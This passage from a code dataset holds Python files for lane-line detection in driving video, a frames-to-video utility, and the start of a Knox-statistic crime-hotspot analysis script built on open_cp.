fails use the previous values\n else:\n print('line.detected is true and roc ratio is > 0.6') \n line.detected = False\n fitx = line.allx\n else:\n # If lane was not detected and no 
curvature is defined\n        if line.radius_of_curvature: \n            if abs(curverad / line.radius_of_curvature - 1) < 1: \n                print('line.detected is false and roc ratio is < 1')\n                line.detected = True\n                line.current_fit = fit\n                line.allx = fitx\n                line.bestx = np.mean(fitx) \n                line.radius_of_curvature = curverad\n            else:\n                print('line.detected is false and roc ratio is > 1')\n                line.detected = False\n                fitx = line.allx \n        # If curvature was defined\n        else:\n            print('first time data getting set in Line object')\n            line.detected = True\n            line.current_fit = fit\n            line.allx = fitx\n            line.bestx = np.mean(fitx)\n            line.radius_of_curvature = curverad\n    return fitx\n\n\n#-----------------------------------------------------------------------#\n# Function to find the lane line pixels for the given binary warped \n# image and using the line positions of previous frame\n#-----------------------------------------------------------------------#\ndef findXY_NonHistogram(binary_warped, left_fit, right_fit):\n    print('Finding fit by non-histogram function')\n    # Assume you now have a new warped binary image \n    # from the next frame of video (also called \"binary_warped\")\n    # It's now much easier to find line pixels!\n    nonzero = binary_warped.nonzero()\n    nonzeroy = np.array(nonzero[0])\n    nonzerox = np.array(nonzero[1])\n    margin = 100\n    left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] + margin))) \n    right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] + margin))) \n    \n    # Again, extract left and right line pixel positions\n    leftx = nonzerox[left_lane_inds]\n    lefty = nonzeroy[left_lane_inds] \n    rightx = nonzerox[right_lane_inds]\n    righty = nonzeroy[right_lane_inds]\n    \n    return leftx, lefty, rightx, righty\n\n\n#-----------------------------------------------------------------------#\n# Function to apply polyfit on the x,y positions and to arrive at the \n# second degree polynomial\n#-----------------------------------------------------------------------#\ndef pixelPositionToXYValues(leftx, lefty, rightx, righty, yvalue):\n    # Fit a second order polynomial to each\n    left_fit = np.polyfit(lefty, leftx, 2)\n    right_fit = np.polyfit(righty, rightx, 2)\n    \n    # Generate x and y values for plotting\n    ploty = np.linspace(0, yvalue-1, yvalue)\n    left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n    right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2] \n    \n    return left_fit, right_fit, left_fitx, right_fitx, ploty\n    \n\n#-----------------------------------------------------------------------#\n# Function to find the lane line pixels for the given binary warped \n# using the Histogram and Sliding window method\n#-----------------------------------------------------------------------#\ndef findXY_Histogram(binary_warped):\n    # Take a histogram of the bottom half of the image; integer division\n    # keeps the slice index an int under Python 3\n    histogram = np.sum(binary_warped[binary_warped.shape[0]//2:,:], axis=0)\n    out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n    #visualizeImageGraph(out_img, histogram)\n\n    # Find the peak of the left and right halves of the histogram\n    # These will be the starting point for the left and right lines\n    midpoint = np.int(histogram.shape[0]/2)\n    leftx_base = np.argmax(histogram[:midpoint])\n    rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n    \n    # Choose the number of sliding windows\n    nwindows = 9\n    
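# (editor note) each of the nwindows strips below spans image_height/nwindows\n    # rows; a window re-centers on the mean x of the pixels found in its strip.\n    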
# Set height of windows\n window_height = np.int(binary_warped.shape[0]/nwindows)\n # Identify the x and y positions of all nonzero pixels in the image\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n \n # Current positions to be updated for each window\n leftx_current = leftx_base\n rightx_current = rightx_base\n # Set the width of the windows +/- margin\n margin = 100\n # Set minimum number of pixels found to recenter window\n minpix = 50\n # Create empty lists to receive left and right lane pixel indices\n left_lane_inds = []\n right_lane_inds = []\n \n # Step through the windows one by one\n for window in range(nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_low = binary_warped.shape[0] - (window+1)*window_height\n win_y_high = binary_warped.shape[0] - window*window_height\n win_xleft_low = leftx_current - margin\n win_xleft_high = leftx_current + margin\n win_xright_low = rightx_current - margin\n win_xright_high = rightx_current + margin\n \n # Draw the windows on the visualization image\n cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0), 2) \n cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0), 2)\n \n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0] \n #print('good_left_inds', good_left_inds)\n #print('good_right_inds', good_right_inds)\n \n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix: \n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n \n # Concatenate the arrays of indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n \n # Extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds] \n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds] \n \n #For Display \n# left_fit, right_fit, left_fitx, right_fitx, ploty = pixelPositionToXYValues(leftx, lefty, rightx, righty, out_img.shape[0])\n# out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n# out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n# plt.imshow(binary_warped, cmap='gray')\n# plt.plot(left_fitx, ploty, color='red', linewidth=3.0)\n# plt.plot(right_fitx, ploty, color='red', linewidth=3.0)\n# plt.xlim(0, 1280)\n# plt.ylim(720, 0)\n# plt.show()\n \n return leftx, lefty, rightx, righty #, out_img\n\n#-----------------------------------------------------------------------#\n# Function to calculate the radius of the curvature for the given x, y\n# values and convert them from pixel to real world metres perspective\n#-----------------------------------------------------------------------#\ndef calculateRadiusOfCurvature(x, y):\n # Define conversions in x and y from pixels space to meters\n ym_per_pix = 30/720 # meters per pixel in y dimension\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n y_eval = 
np.max(y)\n    \n    # Fit new polynomials to x,y in world space\n    fit_cr = np.polyfit(y*ym_per_pix, x*xm_per_pix, 2)\n    # Calculate the new radii of curvature\n    curve_rad = ((1 + (2*fit_cr[0]*y_eval*ym_per_pix + fit_cr[1])**2)**1.5) / np.absolute(2*fit_cr[0])\n    # Now our radius of curvature is in meters\n    #print(left_curverad, 'm', right_curverad, 'm')\n    # Example values: 632.1 m 626.2 m\n    return curve_rad\n\n#-----------------------------------------------------------------------#\n# Function to calculate the vehicle position with respect to lane lines\n# It is calculated based on the image width and lane line coordinates\n#-----------------------------------------------------------------------#\ndef calculateVehiclePosition(image_width, pts):\n    # Find the position of the car from the center\n    # It will show if the car is 'x' meters from the left or right\n    position = image_width/2\n    left = np.min(pts[(pts[:,1] < position) & (pts[:,0] > 700)][:,1])\n    right = np.max(pts[(pts[:,1] > position) & (pts[:,0] > 700)][:,1])\n    center = (left + right)/2\n    # Define conversions in x and y from pixels space to meters\n    xm_per_pix = 3.7/700 # meters per pixel in x dimension\n    #print(position, center, 'in pixels', (position - center))\n    return (position - center)*xm_per_pix\n
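\n# A quick numeric check of the conversion above (pixel values assumed for\n# illustration): with a 1280 px wide frame, position = 640; if the detected\n# lane centre sits at 610 px, the offset is (640 - 610) * 3.7/700 = +0.159 m,\n# which drawPolygonAndUnwrap below reports as right of center.\n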
\n#-----------------------------------------------------------------------#\n# A convenience Function that draws polygon on the given image, reverts \n# the perspective transformation using Minv and writes the texts.\n#-----------------------------------------------------------------------#\ndef drawPolygonAndUnwrap(binary_warped, undist, pts, Minv, img_size, text1, text2=None):\n    # Create an image to draw the lines on\n    warp_zero = np.zeros_like(binary_warped).astype(np.uint8)\n    color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n    # Draw the lane onto the warped blank image\n    cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))\n    # Warp the blank back to original image space using inverse perspective matrix (Minv)\n    newwarp = cv2.warpPerspective(color_warp, Minv, img_size) \n    # Combine the result with the original image\n    result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)\n\n    # Find the position of the car\n    pts = np.argwhere(newwarp[:,:,1])\n    position = calculateVehiclePosition(undist.shape[1], pts)\n    text11 = ''\n    if position < 0:\n        text11 = \"Vehicle is {:.3f} Metre left of center\".format(-position)\n    else:\n        text11 = \"Vehicle is {:.3f} Metre right of center\".format(position)\n    \n    # Put text on an image\n    font = cv2.FONT_HERSHEY_SIMPLEX\n    cv2.putText(result, text1, (10,30), font, 1, (255,255,255), 2)\n    cv2.putText(result, text11, (10,60), font, 1, (255,255,255), 2)\n    cv2.putText(result, text2, (10,100), font, 1, (255,255,255), 2)\n    \n    return result\n\n\n#-----------------------------------------------------------------------#\n# Function to generate a warped thresholded color binary image from the given\n# color image and other threshold parameters\n#-----------------------------------------------------------------------#\n# UNUSED FUNCTION\ndef getBinaryImage1(img, mtx, dist, sobel_kernel=3, s_thresh=(170, 255), sx_thresh=(20, 100)):\n    img1 = np.copy(img)\n#    img = np.copy(img)\n    \n    img = cv2.undistort(img, mtx, dist, None, mtx)\n#    plt.title('In-progress image in the pipeline - Undistorted Image')\n#    plt.imshow(img)\n#    plt.show()\n    undist = np.copy(img)\n    \n\n    img_size = (img.shape[1], img.shape[0])\n    src, dst = getTransformationPoints(img)\n    #pts = np.array([[10,5],[20,30],[70,20],[50,10]], np.int32)\n#    src = src.reshape((-1,1,2))\n#    src1 = src.astype(np.int32)\n#    cv2.polylines(img,[src1],True,(255,0,0), 2)\n    \n    M, Minv = getTransformationMatrices(src, dst)\n    warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)\n#    visualize2Images(img, warped)\n    img = warped\n    #gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n    # Convert to HLS color space and separate the V channel\n    hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype(np.float)\n    h_channel = hls[:,:,0]\n    l_channel = hls[:,:,1]\n    s_channel = hls[:,:,2]\n    #s_channel = gray\n    \n    # Sobel x\n    gradx = abs_sobel_thresh(s_channel, orient='x', sobel_kernel=sobel_kernel, thresh=(20, 100))\n    grady = abs_sobel_thresh(s_channel, orient='y', sobel_kernel=sobel_kernel, thresh=(20, 100))\n    mag_binary = mag_thresh(s_channel, sobel_kernel=sobel_kernel, mag_thresh=(20, 100))\n    dir_binary = dir_threshold(s_channel, sobel_kernel=sobel_kernel, dir_thresh=(0.7, 1.3))\n    combined = np.zeros_like(dir_binary)\n    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1\n    \n    # Threshold color channel\n    s_binary = np.zeros_like(s_channel)\n    s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1\n\n    # Stack each channel\n    # Note color_binary[:, :, 0] is all 0s, effectively an all black image. It might\n    # be beneficial to replace this channel with something else.\n    #color_binary = np.dstack(( img[:,:,1], combined, s_binary))\n    #color_binary = np.dstack(( np.zeros_like(combined), combined, s_binary))\n    color_binary = np.zeros_like(combined)\n    color_binary[(s_binary > 0) | (combined > 0)] = 1\n    #visualize3Images(img1, warped, color_binary)\n    return M, Minv, undist, color_binary\n\n#-----------------------------------------------------------------------#\n# Function to generate a warped thresholded color binary image from the given\n# color image and other threshold parameters\n#-----------------------------------------------------------------------#\ndef getBinaryImage(img, mtx, dist, sobel_kernel=3, s_thresh=(170, 255), sx_thresh=(20, 100)):\n    img1 = np.copy(img)\n    \n    img = cv2.undistort(img, mtx, dist, None, mtx)\n    undist = np.copy(img)\n    \n    img_size = (img.shape[1], img.shape[0])\n    src, dst = getTransformationPoints(img)\n\n    HSV = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n    \n    # For yellow\n    yellow = cv2.inRange(HSV, (20, 100, 100), (50, 255, 255))\n    \n    # For white\n    sensitivity_1 = 68\n    white = cv2.inRange(HSV, (0,0,255-sensitivity_1), (255,20,255))\n    \n    sensitivity_2 = 60\n    HSL = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n    white_2 = cv2.inRange(HSL, (0,255-sensitivity_2,0), (255,255,sensitivity_2))\n    white_3 = cv2.inRange(img, (200,200,200), (255,255,255))\n    \n    bit_layer = np.zeros_like(yellow)\n    bit_layer[(yellow > 0) | (white > 0) | (white_2 > 0) | (white_3 > 0)] = 1\n    \n    M, Minv = getTransformationMatrices(src, dst)\n    warped = cv2.warpPerspective(bit_layer, M, img_size, flags=cv2.INTER_LINEAR)\n    #visualize2Images(img, warped)\n    return M, Minv, undist, warped\n
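\n# A minimal sketch (not part of the original pipeline) of how the cv2.inRange\n# masks in getBinaryImage behave: pixels inside the bounds map to 255 and all\n# others to 0. The sample HSV pixel value here is made up for illustration.\ndef _inRangeDemo():\n    sample = np.uint8([[[30, 180, 200]]])  # a single HSV pixel in the yellow band\n    mask = cv2.inRange(sample, (20, 100, 100), (50, 255, 255))\n    return mask[0, 0]  # 255 -> this pixel would be kept as lane-coloured\n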
\n#-----------------------------------------------------------------------#\n# Define a class to store & send initial settings\n#-----------------------------------------------------------------------#\nclass Parameters():\n    def __init__(self):\n        self.sobel_kernel=7 # Kernel size to use in Sobel processing\n        self.x_thresh = (20, 100) # Threshold for Sobel X-Orientation processing\n        self.y_thresh = (20, 100) # Threshold for Sobel Y-Orientation processing\n        self.mag_thresh = (20, 100) # Threshold for Sobel Magnitude processing\n        self.dir_thresh = (0.7, 1.3) # Threshold for Sobel Directional processing\n        self.s_thresh=(170, 255) # Threshold for the S colour-channel binary\n        self.sx_thresh=(20, 100) # Threshold for the Sobel X gradient binary\n        self.M = None # Perspective Transformation Matrix\n        self.Minv = None # Perspective Transformation Inverse Matrix\n\n    def printValues(self):\n        print('sobel_kernel=', self.sobel_kernel)\n        print('x_thresh=', self.x_thresh)\n        print('y_thresh=', self.y_thresh)\n        print('mag_thresh=', self.mag_thresh)\n        print('dir_thresh=', self.dir_thresh)\n        print('s_thresh=', self.s_thresh)\n        print('sx_thresh=', self.sx_thresh)\n        print('M=', self.M)\n        print('Minv=', self.Minv)\n    \n#-----------------------------------------------------------------------#\n# Define a class to store Camera Calibration settings\n#-----------------------------------------------------------------------#\nclass CameraCalibration():\n    def __init__(self):\n        self.pickle_file_name = 'cam_calib_mtx_dist.p' # Camera Calibration Details Pickle file name\n        self.nx = 9 # Number of inside corners in x axis\n        self.ny = 6 # Number of inside corners in y axis\n        self.mtx = None # Camera Calibration Matrix\n        self.dist = None # Camera Distortion Matrix\n\n#-----------------------------------------------------------------------#\n# The image/frame processing pipeline function. It intakes a color \n# image as an input and returns a color image containing a filled polygon\n# for the lanes identified.\n#-----------------------------------------------------------------------#\ndef pipeline(img, mtx, dist, sobel_kernel=3, s_thresh=(170, 255), sx_thresh=(20, 100)):\n    img_size = (img.shape[1], img.shape[0])\n    global cnt_h\n    global cnt_nh\n\n    M, Minv, undist, binary_warped = getBinaryImage(img, mtx, dist, sobel_kernel, s_thresh=s_thresh, sx_thresh=sx_thresh)\n    out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n    leftx, lefty, rightx, righty = None, None, None, None\n\n    if (left_line.detected == False) or (right_line.detected == False):\n        #find by histogram method\n        print('to detect lane through histogram')\n        leftx, lefty, rightx, righty = findXY_Histogram(binary_warped)\n        cnt_h += 1\n    else:\n        #find by non-histogram method\n        print('to detect lane through non-histogram')\n        leftx, lefty, rightx, righty = findXY_NonHistogram(binary_warped, left_line.current_fit, right_line.current_fit)\n        cnt_nh += 1\n\n    print('Lane finding by Histogram =', cnt_h, ', by Non-Histogram = ', cnt_nh)\n    left_fit, right_fit, left_fitx, right_fitx, ploty = pixelPositionToXYValues(leftx, lefty, rightx, righty, binary_warped.shape[0])\n    #Find Radius of Curvature\n    left_curve_rad = calculateRadiusOfCurvature(leftx, lefty)\n    right_curve_rad = calculateRadiusOfCurvature(rightx, righty)\n    average_curve_rad = (left_curve_rad + right_curve_rad) / 2\n    #print('Left', left_curve_rad, 'metres, Right', right_curve_rad, 'metres', 'Average-smoothed', average_curve_rad)\n    \n    print('left_fitx & right_fitx Before lineCheck', left_fitx[0], right_fitx[0])\n    # Keep the (possibly smoothed) x values returned by lineCheck so the sanity\n    # check actually takes effect downstream\n    left_fitx = lineCheck(left_line, left_curve_rad, left_fitx, left_fit)\n    right_fitx = lineCheck(right_line, right_curve_rad, right_fitx, right_fit)\n    print('left_fitx & right_fitx After lineCheck', left_fitx[0], right_fitx[0])\n    \n    out_img[lefty, leftx] = [255, 0, 0]\n    out_img[righty, rightx] = [0, 0, 255]\n    #visualize2Images(binary_warped, out_img)\n    \n    # Recast the x and y points into usable format for cv2.fillPoly()\n    pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n    pts_right = 
np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n roc_text = \"Radius of Curvature: {0:.3f} Metres (Left={1:.3f}, Right={2:.3f})\".format(average_curve_rad, left_curve_rad, right_curve_rad)\n cnt_text = ''#\"By Histogram:{}, Non-Histogram:{}\".format(cnt_h, cnt_nh)\n result = drawPolygonAndUnwrap(binary_warped, undist, pts, Minv, img_size, roc_text, cnt_text)\n return result\n\n\n# Pipeline to be used for Image processing\n#def pipeline(img, mtx, dist, sobel_kernel=3, s_thresh=(170, 255), sx_thresh=(20, 100)):\n# \n# img_size = (img.shape[1], img.shape[0])\n# M, Minv, undist, binary_warped = getBinaryImage(img, mtx, dist, sobel_kernel, s_thresh=s_thresh, sx_thresh=sx_thresh)\n# out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n# leftx, lefty, rightx, righty, out_img = findXY_Histogram(binary_warped)\n# left_fit, right_fit, left_fitx, right_fitx, ploty = pixelPositionToXYValues(leftx, lefty, rightx, righty, binary_warped.shape[0]) \n# #Find Radius of Curvature\n# left_curve_rad = calculateRadiusOfCurvature(leftx, lefty)\n# right_curve_rad = calculateRadiusOfCurvature(rightx, righty)\n# average_curve_rad = (left_curve_rad + right_curve_rad) / 2\n# print('Left', left_curve_rad, 'metres, Right', right_curve_rad, 'metres', 'Average-smoothed', average_curve_rad)\n# \n# # Find camera position\n# left_mean = np.mean(leftx)\n# right_mean = np.mean(rightx)\n# camera_pos = (img_size[0]/2)-np.mean([left_mean, right_mean])\n# print('camera_pos', camera_pos )\n# xm_per_pix = 3.7/500\n# print('actual camera_pos', str(camera_pos*xm_per_pix)[:6], str(camera_pos*xm_per_pix))\n# \n# out_img[lefty, leftx] = [255, 0, 0]\n# out_img[righty, rightx] = [0, 0, 255]\n# \n# # Recast the x and y points into usable format for cv2.fillPoly()\n# pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n# pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n# pts = np.hstack((pts_left, pts_right))\n# roc_text = \"Radius of Curvature: {0:.3f} Metres (Left={1:.3f}, Right={2:.3f})\".format(average_curve_rad, left_curve_rad, right_curve_rad)\n# result = drawPolygonAndUnwrap(binary_warped, undist, pts, Minv, img_size, roc_text, None)\n# \n# return result\n \n#-----------------------------------------------------------------------#\n# A convenience method to process test images\n#-----------------------------------------------------------------------#\ndef processImages():\n nx = 9 #Number of inside corners in x axis\n ny = 6 #Number of inside corners in y axis\n mtx, dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', nx, ny, 'cam_calib_mtx_dist.p', True)\n #testUndistor('camera_cal/calibration5.jpg', mtx, dist)\n #testUndistor('test_images/test3.jpg', mtx, dist)\n ksize = 7 # Choose a Sobel Kernel size, larger odd number to smooth gradient measurements\n\n # Main Function\n print('\\n***** Starting Main Function *****')\n cam_calib = CameraCalibration()\n cam_calib.mtx, cam_calib.dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', cam_calib.nx, cam_calib.ny, cam_calib.pickle_file_name, True)\n #testUndistor('camera_cal/calibration5.jpg', cam_calib.mtx, cam_calib.dist)\n \n params = Parameters()\n params.camera_calibration = cam_calib\n #params.printValues()\n# left_line = Line()\n# right_line = Line()\n# cnt_h = 0\n# cnt_nh = 0\n\n input_folder = 'test_images'\n output_folder = 'output_images'\n file_pattern = '*.jpg'\n fnames = os.path.join(input_folder, file_pattern)\n 
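# e.g. fnames == 'test_images/*.jpg' ('test_images\\*.jpg' on Windows);\n    # glob.glob below expands this pattern into the list of test image paths.\n    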
print('fnames', fnames)\n #fnames = 'camera_cal/calibration5.jpg'\n \n images = glob.glob(fnames)\n for idx, fname in enumerate(images):\n print(idx, fname)\n image = mpimg.imread(fname)\n result = pipeline(image, mtx, dist, sobel_kernel=ksize, s_thresh=(170, 255), sx_thresh=(20, 100))\n out_file = os.path.join(output_folder, os.path.split(fname)[1])\n #mpimg.imsave(out_file, result)\n plt.figure(figsize=(16,12))\n plt.imshow(result)\n plt.show()\n print()\n return True\n\n#-----------------------------------------------------------------------#\n# A convenience method to process video frame\n#-----------------------------------------------------------------------#\ndef processVideoFrame(image):\n result = pipeline(image, cam_calib.mtx, cam_calib.dist, sobel_kernel=params.sobel_kernel, s_thresh=params.s_thresh, sx_thresh=params.sx_thresh)\n return result\n\n#-----------------------------------------------------------------------#\n# A convenience method to process video file\n#-----------------------------------------------------------------------#\ndef processVideo():\n # Main Function\n print('\\n***** Starting Main Function *****')\n# cam_calib = CameraCalibration()\n# cam_calib.mtx, cam_calib.dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', cam_calib.nx, cam_calib.ny, cam_calib.pickle_file_name, True)\n# #testUndistor('camera_cal/calibration5.jpg', cam_calib.mtx, cam_calib.dist)\n# \n# params = Parameters()\n# params.camera_calibration = cam_calib\n# params.printValues()\n# left_line = Line()\n# right_line = Line()\n# cnt_h = 0\n# cnt_nh = 0\n \n #vc_in_fn = 'NH_45_NearChennai.mp4'\n #vc_in_fn = 'harder_challenge_video.mp4'\n #vc_in_fn = 'challenge_video.mp4'\n vc_in_fn = 'project_video.mp4'\n vc_out_fn = 'out_' + vc_in_fn\n vclip = VideoFileClip(vc_in_fn)\n #vclip = vclip.subclip(0, 30)\n processed_vclip = vclip.fl_image(processVideoFrame)\n processed_vclip.write_videofile(vc_out_fn, audio=False)\n \n print('***** Program Execution Completed *****\\n')\n return True\n\ncam_calib = CameraCalibration()\ncam_calib.mtx, cam_calib.dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', cam_calib.nx, cam_calib.ny, cam_calib.pickle_file_name, True)\n#testUndistor('camera_cal/calibration5.jpg', cam_calib.mtx, cam_calib.dist)\n\nparams = Parameters()\nparams.camera_calibration = cam_calib\n#params.printValues()\ncnt_h = 0\ncnt_nh = 0\nleft_line = Line()\nright_line = Line()\n\n#processImages()\nprocessVideo()\n\n#mtx, dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', 9, 6, pickle_file_name='cam_calib_mtx_dist.p')\n#testUndistor('camera_cal/calibration5.jpg', mtx, dist)\n#testUndistor('test_images/test2.jpg', mtx, dist)","sub_path":"CarND-Advanced-Lane-Lines-P4/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":36659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"3803451","text":"\nfrom os import listdir\nfrom os.path import join, sep\nimport sys\nfrom utils import (check_if_path, remove_empty_folders)\n\n\n# import the function that reads frames and converts them to videos\n#sys.path.append('/vol/atlas/homes/grigoris/gits/pyutils/')\n#import frames2videos as fr2vid\n#import resize_image as rim\n# requires the package from https://github.com/grigorisg9gr/pyutils\nfrom research_pyutils.frames2videos import main as fr2vid_main\nfrom research_pyutils.resize_image import bulkResize\n\n\ndef main_call_visualisation_to_videos(path_0, overwrite):\n path_clips = join(path_0, 
'visualisations', '')\n\n if not check_if_path(path_clips, ''):\n raise ValueError('The visualisation path {} does not seem to exist'.format(path_clips))\n\n # call from parent folder of visualisations, it will make videos for all different steps of the algorithm\n vid_fold = '1_videos'\n call_video_maker(path_clips, vid_fold, overwrite)\n p_cmp = join(path_clips, 'compare', '')\n if check_if_path(p_cmp, ''): # call for comparisons as well\n call_video_maker(p_cmp, vid_fold, overwrite)\n\n\ndef call_video_maker(path_clips, vid_fold, overwrite=False):\n list_paths = sorted(listdir(path_clips))\n for i in list_paths:\n if i == 'compare':\n continue\n p1 = path_clips + i + sep\n if not check_if_path(p1, ''): # if the folder does not exist, continue.\n continue\n # if: a) it has sufficient files, b) overwrite == False, then continue.\n if (not overwrite) and check_if_path(p1 + vid_fold, ''):\n len_clips = len(listdir(p1))\n print(i, ' ', len_clips, ' ', len(listdir(p1 + vid_fold)))\n if len(listdir(p1 + vid_fold)) > len_clips-3:\n continue\n\n remove_empty_folders(p1)\n print(i, ' ', len(listdir(p1)))\n if len(listdir(p1)) == 0:\n continue\n try:\n bulkResize(p1)\n except TypeError as e:\n print('Probably there is a folder with no images {}, skipping it.'.format(p1))\n print(e)\n continue\n except IOError as e:\n print('Probably image not found, skipping this video.')\n print(e)\n continue\n fr2vid_main(p1, vid_fold=vid_fold)\n remove_empty_folders(path_clips)\n\n\nif __name__ == '__main__':\n overwrite_m = False # Overwrite old written videos\n args = len(sys.argv)\n if args > 1:\n path_0_m = str(sys.argv[1])\n else:\n raise RuntimeError('File not called with initial path.')\n if args > 2:\n overwrite_m = True\n main_call_visualisation_to_videos(path_0_m, overwrite_m)\n","sub_path":"visualisations_to_videos.py","file_name":"visualisations_to_videos.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"193623421","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 2 13:35:29 2019\n\n@author: lawdfo\n\"\"\"\n\n\n\n# Some fairly standard modules\nimport os, csv, lzma\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport descartes\nfrom itertools import product\nfrom collections import Counter, defaultdict\nimport random\nimport statistics\n\n# The geopandas module does not come standard with anaconda,\n# so you'll need to run the anaconda prompt as an administrator\n# and install it via \"conda install -c conda-forge geopandas\".\n# That installation will include pyproj and shapely automatically.\n# These are useful modules for plotting geospatial data.\nimport geopandas as gpd\nimport pyproj\nimport shapely.geometry\n\n# These modules are useful for tracking where modules are\n# imported from, e.g., to check we're using our local edited\n# versions of open_cp scripts.\nimport sys\nimport inspect\nimport importlib\n\n# In order to use our local edited versions of open_cp\n# scripts, we insert the parent directory of the current\n# file (\"..\") at the start of our sys.path here.\nsys.path.insert(0, os.path.abspath(\"..\"))\n\n# Elements from PredictCode's custom \"open_cp\" package\nimport open_cp\nimport open_cp.geometry\nimport open_cp.plot\nimport open_cp.sources.chicago as chicago\nimport open_cp.retrohotspot as retro\nimport open_cp.prohotspot as phs\nimport open_cp.knox\n\n\n\n\n\n_cdict = {'red': [(0.0, 1.0, 1.0),\n (1.0, 1.0, 1.0)],\n 'green': [(0.0, 1.0, 
1.0),\n                    (1.0, 0.0, 0.0)],\n          'blue': [(0.0, 0.2, 0.2),\n                   (1.0, 0.2, 0.2)]}\n\nyellow_to_red = matplotlib.colors.LinearSegmentedColormap(\"yellow_to_red\", _cdict)\n\n\n\n\n\nclass KnoxEntry:\n    \n    def __init__(self, start_date = None, end_date = None, num_events = -1):\n        self.start_date = start_date\n        self.end_date = end_date\n        self.num_events = num_events\n        self.pvals = []\n        self.stats = []\n        self.dists = []\n        self.medians = []\n        self.ratios = []\n    \n\n\n\n\n\ndef knox_ratio(knox_statistic, distribution):\n    \"\"\"As in the paper, compute the ratio of the statistic to the median\n    of the values in the distribution\"\"\"\n    #d = np.array(distribution)\n    #d.sort()\n    #return statistic / d[len(d)//2]\n    return knox_statistic / statistics.median(distribution)\n\n\n\n\ndef significant_cells(pvalue_array, sig_thresh=0.05):\n    return pvalue_array < sig_thresh\n\ndef contiguous_cells(data_array, origin=(0,0)):\n    array_dims = np.shape(data_array)\n    need_to_visit_stack = [origin]\n    visited_array = np.zeros_like(data_array, dtype=bool)\n    contig_array = np.zeros_like(data_array, dtype=bool)\n    \n    val = data_array[origin]\n    \n    tempctr = 0\n    while len(need_to_visit_stack)>0:\n        curr_cell = need_to_visit_stack.pop(0)\n        tempctr += 1\n        if visited_array[curr_cell]:\n            continue\n        visited_array[curr_cell] = True\n        if data_array[curr_cell] != val:\n            continue\n        contig_array[curr_cell] = True\n        for dim_index, dim_size in enumerate(array_dims):\n            cc_index_val = curr_cell[dim_index]\n            if cc_index_val>0:\n                need_to_visit_stack.append(curr_cell[:dim_index] + (cc_index_val-1,) + curr_cell[dim_index+1:])\n            if cc_index_val<dim_size-1:\n                need_to_visit_stack.append(curr_cell[:dim_index] + (cc_index_val+1,) + curr_cell[dim_index+1:])\n    return contig_array\n\n\n# The two functions below are reconstructed minimally: their call sites later\n# in this script fix the signatures, but the selection and plotting details\n# are assumptions, not the original analysis code.\ndef get_bandwidths_from_knox(pvalue_array, selection=\"contig_anywhere\", sig_thresh=0.05):\n    \"\"\"Pick (spatial, temporal) bandwidth bin indices from the significant\n    cells of the p-value array. The precise rule per selection mode is 